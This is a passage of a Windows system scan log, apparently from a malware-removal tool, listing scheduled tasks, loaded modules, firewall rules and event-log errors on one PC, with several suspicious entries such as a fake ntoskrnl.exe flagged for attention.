CustomCLSID: HKU\S-1-5-21-2017399490-4096563441-3607321274-1000_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> No File path
CustomCLSID: HKU\S-1-5-21-2017399490-4096563441-3607321274-1000_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> No File path
CustomCLSID: HKU\S-1-5-21-2017399490-4096563441-3607321274-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\cmcfg32.dll (Microsoft Corporation) <==== ATTENTION

==================== Restore Points =========================

26-02-2015 04:00:26 Windows Update
03-03-2015 05:34:09 Windows Update
08-03-2015 16:07:09 Windows Update
11-03-2015 03:00:55 Windows Update
17-03-2015 05:53:06 Windows Update
22-03-2015 19:25:11 Installed Mumble 1.2.8
24-03-2015 03:31:46 Windows Update
25-03-2015 03:00:12 Windows Update
31-03-2015 11:47:20 Windows Update
08-04-2015 00:00:00 Scheduled Checkpoint
11-04-2015 14:40:43 Windows Update
12-04-2015 03:00:11 Windows Update
12-04-2015 21:08:49 Removed LogMeIn Hamachi
15-04-2015 03:00:29 Windows Update
16-04-2015 03:00:28 Windows Update
21-04-2015 05:23:54 Windows Update
28-04-2015 05:24:28 Windows Update
05-05-2015 05:23:58 Windows Update
14-05-2015 06:53:00 Windows Update
15-05-2015 03:01:12 Windows Update
28-05-2015 03:22:05 Windows Modules Installer
11-07-2015 20:04:19 Removed Creative Software AutoUpdate

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 08:34 - 2006-09-18 17:37 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1             localhost

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0ACC1975-C8DF-4511-ABD9-C9BF6D43816E} - System32\Tasks\{E7E85835-530B-46B5-BEB2-82159A3906D5} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{7C7F30F4-94E7-4AA8-8941-90C4A80C68BF}\setup.exe" -c -runfromtemp -l0x0409 -removeonly
Task: {14697598-1E69-4576-AB00-65E6570ABDF8} - System32\Tasks\SomotoUpdateCheckerAutoStart => C:\Users\User\AppData\Local\FilesFrog Update Checker\update_checker.exe <==== ATTENTION
Task: {1F899FAD-1EA6-40B5-873F-BDDA321509C0} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - User => C:\Program Files\Windows Calendar\WinCal.exe
Task: {23846208-F461-4025-A346-729A1DC5FFAD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2017399490-4096563441-3607321274-1000Core => C:\Users\User\AppData\Local\Google\Update\GoogleUpdate.exe [2014-03-15] (Google Inc.)
Task: {2B20B974-3C7E-443A-A38D-ED64618666C0} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {2D271802-63F1-47C0-8705-2C62444C2255} - System32\Tasks\AdobeAAMUpdater-1.0-User-PC-User => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2014-02-27] (Adobe Systems Incorporated)
Task: {368EEEE1-A1BD-4D3A-8FA4-8891344FFA3F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2011-05-19] (Google Inc.)
Task: {3D6C81F7-B10D-4648-BBE2-6A0F854CFA4B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {57E66F82-D593-45A5-8A05-C6EDA769239B} - System32\Tasks\ntoskrnl => C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe [2015-04-27] () <==== ATTENTION
Task: {5C1BB5A7-832E-41B6-894A-37F4603B8078} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-10] (Adobe Systems Incorporated)
Task: {712C6861-2B14-4E72-92BA-22B6921FE2B7} - System32\Tasks\Microsoft\Windows\Wired\GatherWiredInfo => C:\Windows\system32\gatherWiredInfo.vbs
Task: {7B235521-F577-4B09-87AA-434C28E32FA1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2011-05-19] (Google Inc.)
Task: {7FB8F589-333A-4B33-8E49-61D9CDFDB0D8} - System32\Tasks\{88375CD5-7ECB-496E-BCBC-BDCDB957B74C} => Chrome.exe http://ui.skype.com/ui/0/7.2.0.103/en/abandoninstall?page=tsMain
Task: {A3E934EB-B5E1-45A2-BDCE-BFA73C84291D} - System32\Tasks\{5471C7FB-2F5A-4B7A-8BF6-DFCB79E066CD} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{5887D64D-2663-43FB-B4BD-7464C56AB425}\setup.exe" -c -runfromtemp -l0x0409 -removeonly
Task: {ABA76C06-C89D-4CFF-A1BD-262DB20EE902} - System32\Tasks\{0F643B0A-CA26-4BB2-BA29-2B54A3FA88A0} => Chrome.exe http://ui.skype.com/ui/0/6.9.0.106/en/go/help.faq.installer?LastError=1618
Task: {D4A3B5F6-F62A-453D-AF09-8862DADBDB19} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {E217E6AE-46D8-47CB-989A-F281C766CE18} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2017399490-4096563441-3607321274-1000UA => C:\Users\User\AppData\Local\Google\Update\GoogleUpdate.exe [2014-03-15] (Google Inc.)
Task: {E91D6474-70CC-42BE-80FF-8BED8AF557ED} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs
Task: {EEFF4A88-A750-4FF5-B602-737950CDB215} - System32\Tasks\{B51CE80F-F44C-45C4-81E2-DBBCDDA06B97} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2015-01-23] (Skype Technologies S.A.)
Task: {FB29903F-D725-41DD-B4F7-A0D978B2C6C6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2017399490-4096563441-3607321274-1000Core.job => C:\Users\User\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2017399490-4096563441-3607321274-1000UA.job => C:\Users\User\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (Whitelisted) ==============

2013-12-12 21:19 - 2013-12-12 21:19 - 00102400 _____ () C:\Windows\Installer\MSI5D22.tmp
2015-02-13 04:20 - 2015-02-13 04:20 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-02-13 04:20 - 2015-02-13 04:20 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-03-20 11:24 - 2014-03-20 11:24 - 00667808 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
2015-03-18 14:08 - 2015-03-18 14:08 - 08898720 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-05-05 22:29 - 2015-05-05 22:29 - 02466304 _____ () C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll
2015-05-05 22:29 - 2015-05-05 22:29 - 02109440 _____ () C:\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2010-01-02 10:42 - 2010-01-02 10:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2012-06-18 11:24 - 2012-06-18 11:24 - 00222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_05.dll
2014-05-16 18:34 - 2014-05-16 18:34 - 00430344 _____ () C:\Program Files (x86)\Hotspot Shield\bin\hsswd.exe
2014-12-09 18:22 - 2014-12-09 18:22 - 00186048 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2014-03-20 11:24 - 2014-03-20 11:24 - 05288608 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2015-05-14 17:08 - 2015-04-27 15:23 - 00057344 ____R () C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe
2014-05-16 20:11 - 2014-05-16 20:11 - 00908584 _____ () C:\Program Files (x86)\Hotspot Shield\bin\af_proxy.dll
2014-05-16 20:37 - 2014-05-16 20:37 - 00506664 _____ () C:\Program Files (x86)\Hotspot Shield\bin\HssRep.dll
2015-05-05 22:30 - 2015-05-05 22:30 - 00930304 _____ () C:\Users\User\AppData\Local\Adrvworks\sxbkovrb.dll
2015-05-05 22:31 - 2015-05-05 22:31 - 00908800 _____ () C:\Users\User\AppData\Local\Etsltion\xqgdodvs.dll
2013-08-07 15:25 - 2013-08-07 15:25 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2015-03-18 14:08 - 2015-03-18 14:08 - 08898720 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-12-05 05:23 - 2013-12-03 22:47 - 00702416 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\libglesv2.dll
2013-12-05 05:23 - 2013-12-03 22:47 - 00099792 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\libegl.dll
2013-12-05 05:23 - 2013-12-03 22:48 - 04055504 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\pdf.dll
2013-12-05 05:23 - 2013-12-03 22:48 - 00399312 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll
2013-12-05 05:23 - 2013-12-03 22:47 - 01619408 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ffmpegsumo.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\Control Panel\Desktop\\Wallpaper -> %WINDIR%\Web\Wallpaper\Windows\img0.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{563AA22A-F222-4E82-8BD0-398E970E6E24}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sonic & All-Stars Racing Transformed\Launcher.exe
FirewallRules: [{E9994212-5173-4CFE-849E-8F2A9DA74A1F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sonic & All-Stars Racing Transformed\Launcher.exe
FirewallRules: [{062D0B04-C58F-4CEF-94D2-3C82619E9F52}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sonic & All-Stars Racing Transformed\ASN_App_PcDx9_Final.exe
FirewallRules: [{1696B5F4-A5DE-4023-B95F-45DB7BF2D6D9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sonic & All-Stars Racing Transformed\ASN_App_PcDx9_Final.exe
FirewallRules: [UDP Query User{296A1118-4C40-4018-9625-5B7279B04E73}C:\users\user\desktop\multiforce\multiforce.exe] => (Allow) C:\users\user\desktop\multiforce\multiforce.exe
FirewallRules: [TCP Query User{FD369D65-451F-4FB7-A4C1-536CB3017556}C:\users\user\desktop\multiforce\multiforce.exe] => (Allow) C:\users\user\desktop\multiforce\multiforce.exe
FirewallRules: [{611C7231-8063-43E9-BC1E-12846E91C9B3}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe
FirewallRules: [{1371329D-7DD8-4001-8C14-29D98BAB1436}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe
FirewallRules: [{762DEA37-827F-484C-B5A3-7F4E94D3A6B2}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{123604CF-0815-4D65-A654-6EB5E93FFF98}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{7087E43E-96FD-40EF-A106-EA8B5731375A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2293\Agent.exe
FirewallRules: [{0D73A65C-EB05-428C-BC0E-F1AF46DFDF02}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2293\Agent.exe
FirewallRules: [{6B6DE39E-9A9B-406E-8067-1404165634AE}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2045\Agent.exe
FirewallRules: [{82768F3F-F155-45A8-ACB1-28D6D382A2D4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2045\Agent.exe
FirewallRules: [{7909ABD4-CABC-4324-B17E-6F8B78A8F506}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rollercoaster Tycoon 3 Gold\RCT3plus.exe
FirewallRules: [{951F1DFA-1D00-4D65-A872-A378AF31A37D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rollercoaster Tycoon 3 Gold\RCT3plus.exe
FirewallRules: [{477C131F-27DD-47C1-9F08-E1004943DC62}] => (Allow) C:\Users\User\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{7FAA5420-DCB2-49F8-91A3-FF333ED88526}] => (Allow) C:\Users\User\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{4ABA20E2-F362-4A4E-93D8-19AC7026B0B1}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{9CC41FEB-F36E-42ED-985F-8B92D8512CD2}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{0A895A29-DC18-4B9D-8EFB-2DCB1D16B3C3}] => (Allow) LPort=1900
FirewallRules: [{3BBF3E63-91E0-41D7-AAAE-CBE6BE37FEAA}] => (Allow) LPort=2869
FirewallRules: [{2FF68D34-A3B0-4060-A675-4CC499BD63F9}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{0AAEF7D6-7F01-4E81-A915-A9B14DC1FB84}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{955DEFDE-2743-48DF-B88E-E1070FEBF741}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{A86524B1-FA38-42A0-B4AA-70B9AFAB459B}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{C652AFFA-4CB9-4813-8000-36DF90849F99}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{C6232ADD-0B9A-4712-AD1C-4B44D7B70238}] => (Allow) LPort=8317
FirewallRules: [TCP Query User{88B129A9-1526-4475-9CCA-385006FA3CA9}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{5B811586-6458-4579-B683-AC0F27CF6C73}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [{F9005590-036A-470C-B022-7E1DD9455324}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2514\Agent.exe
FirewallRules: [{B341A104-BC1D-46F2-B77A-ACBB48252A5A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2514\Agent.exe
FirewallRules: [TCP Query User{5065ECB7-B3FE-444E-A266-D31EB482616B}C:\program files\java\jre7\bin\java.exe] => (Allow) C:\program files\java\jre7\bin\java.exe
FirewallRules: [UDP Query User{858096C4-14BB-4EEB-8A9D-A73488DC0719}C:\program files\java\jre7\bin\java.exe] => (Allow) C:\program files\java\jre7\bin\java.exe
FirewallRules: [TCP Query User{7BD03C9A-7ED1-49DB-8DE1-A2E2B5E87768}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{F9B40607-F29E-4957-B5DC-370B4ADB09CE}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{726C200A-A77E-43B7-8553-D072E5F949ED}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{A5396E97-415F-4EB7-8447-D3383C427F21}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{5E56E378-99EA-43F6-8011-31CD07DF3997}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0BB6999C-7BD3-464D-A680-119CD1EEEC28}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{A41A7A3E-9CE8-4C8B-ABBF-2B7838BBEF90}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{81E9DEAC-6CDB-4801-A88E-013E1499D602}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8EA69E71-7132-4B9A-B169-5F9CC16C3581}] => (Allow) C:\Users\User\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{DA52D08F-869A-4316-89B3-886B6D2BA12F}] => (Allow) C:\Users\User\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{4ACD9301-BD15-4C6A-B0BE-89A65F12785B}C:\users\user\downloads\multiforce (1).exe] => (Allow) C:\users\user\downloads\multiforce (1).exe
FirewallRules: [UDP Query User{0128BE4F-9475-402E-9AF7-0A251E51597F}C:\users\user\downloads\multiforce (1).exe] => (Allow) C:\users\user\downloads\multiforce (1).exe
FirewallRules: [TCP Query User{8B3B4773-874B-41D1-BAFF-08E89181CC9F}C:\users\user\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\user\appdata\local\popcorn time\node-webkit\popcorn time.exe
FirewallRules: [UDP Query User{E87B9432-6DE9-4D20-B65F-AD70FCE127AF}C:\users\user\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\user\appdata\local\popcorn time\node-webkit\popcorn time.exe
FirewallRules: [{16E70619-1B96-4FC9-96B8-1BCA94481AF3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B8EC8564-8619-4980-8559-FB476ABB228F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{3CD121A7-B981-46B2-A3C2-82B0ED17EE33}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{1C34CE01-BAA5-4B62-9B2F-7BFFC7A2C581}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{D4DA4474-B9A3-461F-82FC-FB31B2620F6D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{45373446-D3B9-45C6-AFD8-65958FF42176}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{6A4D28B7-9088-42C1-8B62-6334F30E79D8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{471B6319-A666-40EB-85E7-B4CD87168A8E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{B0EC954C-069E-4044-8BCF-FE129E412A07}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{3DC2A9C3-4DEF-4239-B0C3-6B3EC8935B87}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5E2861F7-E350-4618-B7CF-A8AB3A0127FD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6810900B-A5C1-4ED7-A52F-A99BE3C6C046}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{D6396D17-8EBB-4C04-A327-2D4E2FFD2298}] => (Allow) C:\Program Files (x86)\iOSinstaller\iOSinstaller.exe
FirewallRules: [{C2752854-9D61-4306-96D1-3FB31FDCFEBE}] => (Allow) C:\Program Files (x86)\iOSinstaller\iOSinstaller.exe
FirewallRules: [{99DF4BB1-DBAF-42A5-BCFB-4CE61F5A89D2}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [{9475BD75-B033-494A-B844-0134B057C2A9}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{39FE2F75-9408-4E78-9E40-36171D2E70A6}] => (Allow) C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe
FirewallRules: [{AB7BE6D2-C95A-4E31-99C2-AA1E6B4434B3}] => (Allow) C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe
FirewallRules: [{CCD1922C-B048-48CD-9040-D0018127B39B}] => (Allow) C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe
FirewallRules: [{984DDEBE-5148-4C32-9CAD-4AD1FD7B1060}] => (Allow) C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (07/11/2015 08:01:33 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418231

Error: (07/11/2015 07:51:59 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT AUTHORITY)
Description: The performance counter name string value in the registry is not formatted correctly. The malformed string is 11806. The first DWORD in the Data section contains the index value to the malformed string while the second and third DWORDs in the Data section contain the last valid index values.

Error: (07/11/2015 07:51:55 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/11/2015 07:51:55 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT AUTHORITY)
Description: The performance counter name string value in the registry is not formatted correctly. The malformed string is 11806. The first DWORD in the Data section contains the index value to the malformed string while the second and third DWORDs in the Data section contain the last valid index values.

Error: (07/11/2015 07:48:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/11/2015 07:48:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied.
]

Error: (07/11/2015 07:48:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied.
]

Error: (07/11/2015 07:48:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied.
]

Error: (07/11/2015 07:44:56 PM) (Source: MSSQL$SQLEXPRESS) (EventID: 3414) (User: )
Description: An error occurred during recovery, preventing the database 'master' (database ID 1) from restarting. Diagnose the recovery errors and fix them, or restore from a known good backup. If errors are not corrected or expected, contact Technical Support.

Error: (07/10/2015 12:45:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program NOTEPAD.EXE version 6.1.7600.16385 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 3d00

Start Time: 01d0bb2f96ea4aa3

Termination Time: 1

Application Path: C:\Windows\system32\NOTEPAD.EXE

Report Id: fb46b891-2722-11e5-8e24-001c26dd0d2e


System errors:
=============
Error: (07/11/2015 07:48:18 PM) (Source: DCOM) (EventID: 10016) (User: User-PC)
Description: application-specificLocalActivation{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}{56BE716B-2F76-4DFA-8702-67AE10044F0B}User-PCUserS-1-5-21-2017399490-4096563441-3607321274-1000LocalHost (Using LRPC)

Error: (07/11/2015 07:48:18 PM) (Source: DCOM) (EventID: 10016) (User: User-PC)
Description: application-specificLocalActivation{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}{56BE716B-2F76-4DFA-8702-67AE10044F0B}User-PCUserS-1-5-21-2017399490-4096563441-3607321274-1000LocalHost (Using LRPC)

Error: (07/11/2015 07:48:17 PM) (Source: DCOM) (EventID: 10016) (User: User-PC)
Description: application-specificLocalActivation{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}{56BE716B-2F76-4DFA-8702-67AE10044F0B}User-PCUserS-1-5-21-2017399490-4096563441-3607321274-1000LocalHost (Using LRPC)

Error: (07/11/2015 07:45:14 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Search Protect Service service failed to start due to the following error:
%%2

Error: (07/11/2015 07:44:57 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The SQL Server (SQLEXPRESS) service terminated with service-specific error %%3417.

Error: (07/11/2015 07:43:48 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 12:47:43 PM on ‎7/‎10/‎2015 was unexpected.

Error: (07/10/2015 12:44:43 PM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk6\DR6.

Error: (07/10/2015 12:33:05 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.

Error: (07/10/2015 12:27:51 PM) (Source: DCOM) (EventID: 10016) (User: User-PC)
Description: application-specificLocalActivation{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}{56BE716B-2F76-4DFA-8702-67AE10044F0B}User-PCUserS-1-5-21-2017399490-4096563441-3607321274-1000LocalHost (Using LRPC)

Error: (07/10/2015 12:27:50 PM) (Source: DCOM) (EventID: 10016) (User: User-PC)
Description: application-specificLocalActivation{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}{56BE716B-2F76-4DFA-8702-67AE10044F0B}User-PCUserS-1-5-21-2017399490-4096563441-3607321274-1000LocalHost (Using LRPC)


Microsoft Office:
=========================
Error: (07/11/2015 08:01:33 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418231

Error: (07/11/2015 07:51:59 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT AUTHORITY)
Description: 11806161E2E00001C2E00001D2E0000B8010000

Error: (07/11/2015 07:51:55 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/11/2015 07:51:55 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT AUTHORITY)
Description: 11806161E2E00001C2E00001D2E000068010000

Error: (07/11/2015 07:48:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/11/2015 07:48:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: {e579ab5f-1cc4-44b4-bed9-de0991ff0623}Coordinator0x80070005, Access is denied.

Error: (07/11/2015 07:48:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: {e579ab5f-1cc4-44b4-bed9-de0991ff0623}Coordinator0x80070005, Access is denied.

Error: (07/11/2015 07:48:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: {e579ab5f-1cc4-44b4-bed9-de0991ff0623}Coordinator0x80070005, Access is denied.

Error: (07/11/2015 07:44:56 PM) (Source: MSSQL$SQLEXPRESS) (EventID: 3414) (User: )
Description: master1

